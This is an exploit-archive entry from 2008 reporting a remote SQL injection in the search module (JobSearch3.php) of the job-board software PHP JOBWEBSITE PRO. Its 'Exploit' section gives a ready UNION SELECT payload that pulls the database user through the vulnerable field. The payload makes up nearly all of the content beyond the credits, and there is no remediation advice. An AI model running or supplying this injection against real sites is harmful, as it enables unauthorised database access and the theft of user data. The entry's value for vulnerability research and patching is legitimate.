id: 3175
date: 06/12/2008
title: PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability
author: JosS
cves: 

===============================================================
PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability
===============================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: PHP JOBWEBSITE PRO (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch3.php

[~] /jobseekers/JobSearch3.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,5,user(),7,8,9,0,1,2,3,4,5/*



#  0day.today [2023-03-25]  #